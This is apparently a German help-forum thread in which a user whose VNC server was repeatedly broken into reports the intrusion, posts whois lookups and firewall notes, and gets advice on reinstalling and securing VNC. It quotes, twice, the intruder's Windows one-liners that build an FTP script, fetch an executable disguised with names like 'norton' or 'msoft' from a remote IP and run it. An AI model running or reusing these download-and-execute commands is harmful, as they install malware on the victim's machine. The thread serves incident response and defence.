Ich habe seit kurzem 2 weitere Probleme. Der Datei-Explorer schmiert (auch im Leerlauf) ständig ab (Keine Rückmeldung), so dass ich ihn immer mit dem Task Manager zwingen muß, sich zu schließen. Jeder weiss, was dann immer passiert. Der Desktop ist kurz weg und die explorer.exe startet neu.
Das andere ist, dass meine Freundin mir heute erzählte, dass sie sich letzte Woche mehrfach nicht in ihren GMX-, Ebay- und ….-Account einloggen konnte, obwohl sie das richtige PW verwendete. Erst wenn sie das PW in einen Editor eingegeben und in die Zwischenablage geholt hatte, um dann mit STRG-V das PW einzugeben, konnte sie sich einloggen !!!???

Ich habe mir heute mal ein wenig Zeit genommen und ein paar Dinge gecheckt.

- VNC-Log (siehe weiter unten):
konnte ich nicht finden 

- FW-Log: In den Einstellungen fand ich, dass Log-files nur maximal …. kb groß sein dürfen. Dies reicht jedoch gerade für 2 Tage. Der Vorfall während der Nachhilfe war jedoch bereits am 04/11/07. 

- Suche nach den Dateien, die herunterzuladen versucht wurden.
Ich durchsuchte all meine Platten mit der Datei-Explorer-Suche und mit der TuneUp Undelete Suche. Die Letztere begibt sich auf die Suche nach bereits gelöschten Dateien.
- mit Registry Finder von jv16 PowerTools die kpl Reg durchsucht
- jede Suche wurde sowohl nach kpl Dateinamen (ohne Erweiterung) als auch nach gewissen Fragmenten ihrer Namen (unter Verwendung von Wildcards, versteht sich) durchgeführt
- kein Ergebnis 

Erklärt mich jetzt nicht für verrückt, aber ich habe dem Script 2mal erneut Zugriff erteilt, indem ich den VNC-Server wieder habe laufen lassen, um so ein FW-Log zu erzeugen. Zunächst hatte ich die Einstellung prompt local user to accept connection aktiv, mit der nichts passierte. Erst nachdem ich diese Einstellung deaktivierte und ein paar Minuten wartete, kam wieder jemand auf meinen Rechner. Dann schrieb sich wieder Folgendes in mein Ausführen-Dialog:

cmd /c echo OPEN 78.54.224.154 23330>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

bzw. Beim zweiten Mal

cmd /c echo open 78.54.38.155 1445 >> i &echo user gnttac gnttac >> i &echo get msoft56684.exe >> i &echo quit >> i &ftp -nv -s:i &msoft56684.exe &exit

Dann ging die ftp-shell auf:

OPEN 78.54.224.154 (bzw. 78.54.38.155)

Währenddessen versuchte ich verzweifelt die Client-IP herauszubekommen. Aber genau wie die Log-Funktion scheint auch diese Funktionalität den Käufern von RealVNC vorbehalten zu sein. Ich habe jedoch nur die Free Edition.

Meine Firewall jedoch hatte nun ein Log, den ich in der nächsten Antwort angehangen habe. Die Excel-Datei konnte ich nicht hochladen, deshalb sieht die Word-Version ein wenig blöd aus. Habe die Liste etwas aufbereitet, einerseits zur Anonymisierung und andererseits damit man dort besser durchsieht. Wenn sich diese Datei mal jemand anschauen würde, wäre ich sehr dankbar. Bei Bedarf kann ich auch die Excel Datei zusenden.

Auch führte ich beim 2. Mal ein backtrace (whois) durch, um evtl auf diesem Wege noch mehr zu erfahren. Diese beiden IPs finden sich auch in meinem FW-Log.

*************************************************
Detailinformation von [78.54.38.155]:
% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See Whois Database Copyright

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag

% Information related to '78.53.192.0 - 78.54.159.255'

inetnum: 78.53.192.0 - 78.54.159.255
netname: HANSENET-ADSL
descr: HanseNet Telekommunikation GmbH
descr: ALICE DSL
country: DE
admin-c: HNT-RIPE
tech-c: HANO-RIPE
status: ASSIGNED PA
mnt-by: HANSENET-MNT
mnt-lower: HANSENET-NOC
mnt-routes: HANSENET-MNT
source: RIPE # Filtered

role: HanseNet IP Coordination
address: HanseNet Telekommunikation GmbH
address: Ueberseering 33 A
address: D-22297 Hamburg
address: Germany
phone: +49 40 23726 0
fax-no: +49 40 23726 193996
abuse-mailbox: abuse@hansenet.com
admin-c: DM3738-RIPE
tech-c: HANO-RIPE
nic-hdl: HNT-RIPE
mnt-by: HANSENET-MNT
source: RIPE # Filtered

role: HanseNet Network Operators
address: HanseNet Telekommunikation GmbH
address: Ueberseering 33a
address: D-22297 Hamburg
abuse-mailbox: abuse@hansenet.com
admin-c: DM3738-RIPE
tech-c: TG819-RIPE # Thomas Graumann
tech-c: EULE-RIPE # Marco Eulenfeld
tech-c: SA1375-RIPE # Svend Andersen
tech-c: ASZ-RIPE # Andreas Schwarz
tech-c: OLBA-RIPE # Olaf Baumert
nic-hdl: HANO-RIPE
mnt-by: HANSENET-NOC
source: RIPE # Filtered

% Information related to '78.48.0.0/13AS13184'

route: 78.48.0.0/13
descr: HANSENET
origin: AS13184
mnt-by: HANSENET-MNT
source: RIPE # Filtered

*************************************************

Detailinformation von [85.179.104.152]:
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See Whois Database Copyright

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '85.176.0.0 - 85.182.127.255'

inetnum: 85.176.0.0 - 85.182.127.255
netname: HANSENET-ADSL
descr: ALICE DSL
descr: HanseNet Telekommunikation GmbH
descr: ADSL Pool Customers
country: DE
admin-c: HNT-RIPE
tech-c: HANO-RIPE
status: ASSIGNED PA
mnt-by: HANSENET-MNT
mnt-lower: HANSENET-NOC
mnt-routes: HANSENET-MNT
source: RIPE # Filtered

role: HanseNet IP Coordination
address: HanseNet Telekommunikation GmbH
address: Ueberseering 33 A
address: D-22297 Hamburg
address: Germany
phone: +49 40 23726 0
fax-no: +49 40 23726 193996
abuse-mailbox: abuse@hansenet.com
admin-c: DM3738-RIPE
tech-c: HANO-RIPE
nic-hdl: HNT-RIPE
mnt-by: HANSENET-MNT
source: RIPE # Filtered

role: HanseNet Network Operators
address: HanseNet Telekommunikation GmbH
address: Ueberseering 33a
address: D-22297 Hamburg
abuse-mailbox: abuse@hansenet.com
admin-c: DM3738-RIPE
tech-c: TG819-RIPE # Thomas Graumann
tech-c: EULE-RIPE # Marco Eulenfeld
tech-c: SA1375-RIPE # Svend Andersen
tech-c: ASZ-RIPE # Andreas Schwarz
tech-c: OLBA-RIPE # Olaf Baumert
nic-hdl: HANO-RIPE
mnt-by: HANSENET-NOC
source: RIPE # Filtered

% Information related to '85.176.0.0/13AS13184'

route: 85.176.0.0/13
descr: HANSENET
origin: AS13184
mnt-by: HANSENET-MNT
source: RIPE # Filtered

*************************************************

Des weiteren nahm ich mal das Kommando auseinander, um dort vllt ein paar Rückschlüsse zu finden.

cmd /c echo OPEN 78.54.224.154 23330>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

Zum x konnte ich nichts finden. Ich nehme an (wegen del x), dass es eine Variable ist, die den Dateinamen aufnimmt bzw zurückgibt.
-n unterdrückt die Möglichkeit der automatischen Anmeldung beim ersten Verbindungsaufbau.
-s: Dateiname
Gibt eine Textdatei an, die ftp-Befehle enthält. Diese Befehle werden nach dem Start von ftp automatisch ausgeführt. Dieser Parameter lässt keine Leerzeichen zu. Verwenden Sie diesen Parameter statt der Umleitung (<).

/c führt den durch Zeichenfolge angegebenen Befehl aus und beendet dann die Ausführung.

Echo
Schaltet die Befehlsanzeigenfunktionen ein bzw. aus oder zeigt eine Meldung an. Ohne Angabe von Parametern zeigt echo die aktuelle Echoeinstellung an.
Syntax
echo [{on | off}] [Nachricht]
Parameter
{ on| off}
Gibt an, ob die Befehlsanzeigenfunktion ein- (on) oder ausgeschaltet (off) wird.
Nachricht
Gibt den Text an, der auf dem Bildschirm angezeigt werden soll.
/?
Zeigt Hilfe an der Eingabeaufforderung an.
Hinweise
• Die Verwendung von echo Nachricht ist hilfreich, wenn echo deaktiviert ist. Falls Sie eine mehrzeilige Meldung anzeigen möchten, ohne dass andere Befehle angezeigt werden, können Sie in der Batchdatei nach dem Befehl echo off mehrere Instanzen des Befehls echo Nachricht verwenden.
• Wenn Sie echo off verwenden, wird die Eingabeaufforderung nicht auf dem Bildschirm angezeigt. Geben Sie den Befehl echo on ein, um die Eingabeaufforderung anzuzeigen.
• Sie können die Wiedergabe einer Zeile verhindern, indem Sie in einer Batchdatei vor dem Befehl ein At-Zeichen (@) eingeben.
• Um eine leere Zeile auf dem Bildschirm wiederzugeben, müssen Sie Folgendes eingeben:
echo.
• Verwenden Sie ein Caretzeichen (^), um Umleitungs- (< und >) oder Verkettungszeichen (|) zusammen mit echo zu verwenden. Geben Sie das Caretzeichen unmittelbar vor dem jeweiligen Zeichen ein (z. B. ^>, ^ oder ^| ). Geben Sie zwei aufeinander folgende Caretzeichen (^^) ein, wenn Sie das Caretzeichen selbst verwenden möchten.


Ftp: open
Stellt eine Verbindung zum angegebenen FTP-Server her.
Ftp: get
Kopiert eine Remotedatei auf den lokalen Computer. Dabei wird der aktuelle Dateiübertragungsmodus verwendet.
Beim Befehl sort habe ich gefunden:
Die Verwendung des Kleiner-als-Zeichens (<) oder Größer-als-Zeichens (>) zum Angeben der Eingabe- bzw. Ausgabedatei ist u. U. wenig effizient.

Zitat:

ich verwende UltraVNC (Opensource). Du solltest immer auf aktuelle Versionen achten

Ich habe mal danach geschaut. Die aktuellste Version von UltraVNC ist 1.0.2 und vom 01.07.2006. Gibt es da evtl noch aktuellere Tools ?

Zitat:

Die Zugangsversuche wurden im Ereignisprotokoll angezeigt. Das könntest du übrigens auch mal nachschauen. Normalerweise wird auch die IP-Adresse protokolliert.

Ich konnte weder im RealVNC Installationsordner noch in den Einstellungen irgendwas von Log-Files finden. Gibt es evtl einen anderen Ort, wo ein solcher Dienst sein Log ablegt ?

Zitat:

Bei Adminrechten wäre es nämlich locker möglich, die PFW abzuschalten. Vllt hater auch er selber kurzerhand auf Erlauben geklickt. Die PFW würde ich da nicht als große Hürde einstufen.

Also ich bin mir ziemlich sicher, dass die FW weder deaktiviert wurde, noch, dass jemand fremdes selbst auf Traffic zulassen geklickt hat.

Die obige Recherche lässt mich vorbehaltlich Eurer Meinung zu meinem FW-Log darauf schließen, dass keinerlei Dateien runtergeladen oder gar ausgeführt wurden. Dennoch bin ich gerade wegen der 2 neuen Probleme (siehe ganz oben) etwas verunsichert.

Zitat:

Alle Änderungen zu erfassen ist quasi unmöglich. Wenn du wieder ein garantiert vertrauenswürdiges System haben willst, muss du neu aufsetzen oder ein sauberes Image zurückspielen. … Wie schon erwähnt, wenn man sichergehen will, und das ist verständlich bei deinem doch recht kritischen Vorfall, musst du neu aufsetzen. Dann hast du garantiert keine Überreste des Angreifers mehr im System.

Gut, dies werde ich bei nächster Gelegenheit tun, aber ein Frage habe ich dazu.

Ich habe mehrere Partitionen und auf C: nur mein System. Dinge wie ‚Eigene Dateien’ oder TBird Emails habe ich von Anfang an auf eine der anderen Partitionen ausgelagert. Auch Spiele sind auf anderen Partitionen installiert und mussten trotz neu aufgesetzter Systeme nicht neu installiert werden.
Wenn ich nun ein neues System aufsetze, wer garantiert mir, dass keinerlei befallene Dateien auf den anderen Partitionen schadhaften Code danach erneut platzieren ?

Vielen vielen Dank für Eure Geduld mit mir. Solangsam ist mir das nämlich ein wenig peinlich, gerade weil ich wahrscheinlich längst hätte ein neues System aufsetzen können 

Zitat:

Das andere ist, dass meine Freundin mir heute erzählte, dass sie sich letzte Woche mehrfach nicht in ihren GMX-, Ebay- und ….-Account einloggen konnte, obwohl sie das richtige PW verwendete. Erst wenn sie das PW in einen Editor eingegeben und in die Zwischenablage geholt hatte, um dann mit STRG-V das PW einzugeben, konnte sie sich einloggen !!!???

Hm das kann ich nicht nachvollziehen. Macht sie das von einem anderen Rechner aus oder auch von deinem wo der VNC läuft?

Zitat:

Erst nachdem ich diese Einstellung deaktivierte und ein paar Minuten wartete, kam wieder jemand auf meinen Rechner.

Hast du den Standartport von 5800/5900 denn mittlerweile geändert? So langsam hab ich das Gefühl, dass da was automatisiertes bei dir hintersteckt und eine Sicherheitslücke in deinem VNC-Server ausnutzt. Wechsel daher mal zu UltraVNC und nimm einen anderen Port.

Zitat:

Währenddessen versuchte ich verzweifelt die Client-IP herauszubekommen. Aber genau wie die Log-Funktion scheint auch diese Funktionalität den Käufern von RealVNC vorbehalten zu sein. Ich habe jedoch nur die Free Edition.
...
Ich habe mal danach geschaut. Die aktuellste Version von UltraVNC ist 1.0.2 und vom 01.07.2006. Gibt es da evtl noch aktuellere Tools ?

Probier unbedingt mal UltraVNC 1.0.2 aus. Das ist die z.Z. aktuelle Version. Es gibt zwar neuere Versionen, aber auf der Website waren sie noch ausdrücklich als Beta angegeben.
Hast du das Howto für sicheres VNC mal beachtet?

Wegen der IP-Adresse: Bist du zufällig selber bei Alice-DSL?

Zitat:

Ich konnte weder im RealVNC Installationsordner noch in den Einstellungen irgendwas von Log-Files finden. Gibt es evtl einen anderen Ort, wo ein solcher Dienst sein Log ablegt ?

Im Systemereignisprotokoll in der Computerverwaltung. Jedenfalls legt UltraVNC da die Ereignisse ab.

Zitat:

Die obige Recherche lässt mich vorbehaltlich Eurer Meinung zu meinem FW-Log darauf schließen, dass keinerlei Dateien runtergeladen oder gar ausgeführt wurden. Dennoch bin ich gerade wegen der 2 neuen Probleme (siehe ganz oben) etwas verunsichert.

Das mag vllt. sein, aber du weißt nicht, was der noch im System angestellt hat. Jedenfalls wäre es nicht wirklich klug, davon auszugehen, dass nichts weiteres passiert ist.

Zitat:

Auch Spiele sind auf anderen Partitionen installiert und mussten trotz neu aufgesetzter Systeme nicht neu installiert werden.

Hm, die meisten Spiele/Programme müssen ebenfalls neu installiert werden, da das Setup beim Installieren ne Menge wichtiger Daten auch in bestimmte Ordner auf der Systempartition sowie in die Registry schreibt. Das wäre also höchstens Zufall wenn die Programme/Spiele alle reibungslos laufen würden.

Zitat:

Wenn ich nun ein neues System aufsetze, wer garantiert mir, dass keinerlei befallene Dateien auf den anderen Partitionen schadhaften Code danach erneut platzieren ?

Das kann man nicht garantieren. Grundsätzlich kann jede Datei schlecht sein, erst recht ausführbare Dateien. Wenn du sicher gehen willst, löscht du auch alle ausführbaren Dateien auf den anderen Partitionen und behälst nur reine Datendateien wie z.B. Musik, Videos und Officedokumente.

Sygate PFW Log

- xls ist nicht erlaubt

- doc datei war zu groß

- selbst die txt (tabstop seperated) war zu groß

ich habe die log datei stark beschneiden müssen. wer die ganze begutachten will, muss mir einfach bescheidgeben. gerade in excel ist es am einfachsten zu überblicken.

Zitat:

Hm das kann ich nicht nachvollziehen. Macht sie das von einem anderen Rechner aus oder auch von deinem wo der VNC läuft?

Sie saß die Woche über an meinem Rechner. Der VNC lief allerdings bei keiner dieser Sessions.

Zitat:

Probier unbedingt mal UltraVNC 1.0.2 aus. ...
Hast du das Howto für sicheres VNC mal beachtet? ...
Wegen der IP-Adresse: Bist du zufällig selber bei Alice-DSL?

Bevor ich das nächste Mal VNC nutze werde ich die UVNC 1.0.2 installieren und das HowTo beachten.

Ja ich bin bei Alice, aber das sind nicht meine IPs gewesen.

Zitat:

Im Systemereignisprotokoll in der Computerverwaltung.

Da werde ich mal nachsehen und hier mein Ergebnis posten.

Thx a lot

Zitat:

Sie saß die Woche über an meinem Rechner. Der VNC lief allerdings bei keiner dieser Sessions.

Dann ist da imho nicht wirklich verwunderlich...wer weiß was da noch so an deiner Kiste manipuliert wurde. Und da spielt es dann auch keine Rolle mehr ob VNC lief oder nicht.
Sie sollte mal sich an einer sicheren Kiste setzen und von dort alle Passwörter ändern. Sie kann auch deinen Rechner nehmen, diesen aber vorher mit z.B. mit Knoppix starten, ist ein Linux-Live-System.

Überprüf mal im FW-Log die IP-Adressen bei den VNC-Einträgen. Ich kann da nicht viel zu sagen ob es deine ist oder nicht.

Änder jetzt mal endlich den Standortport und schau ob immer noch jmd. raufkommt.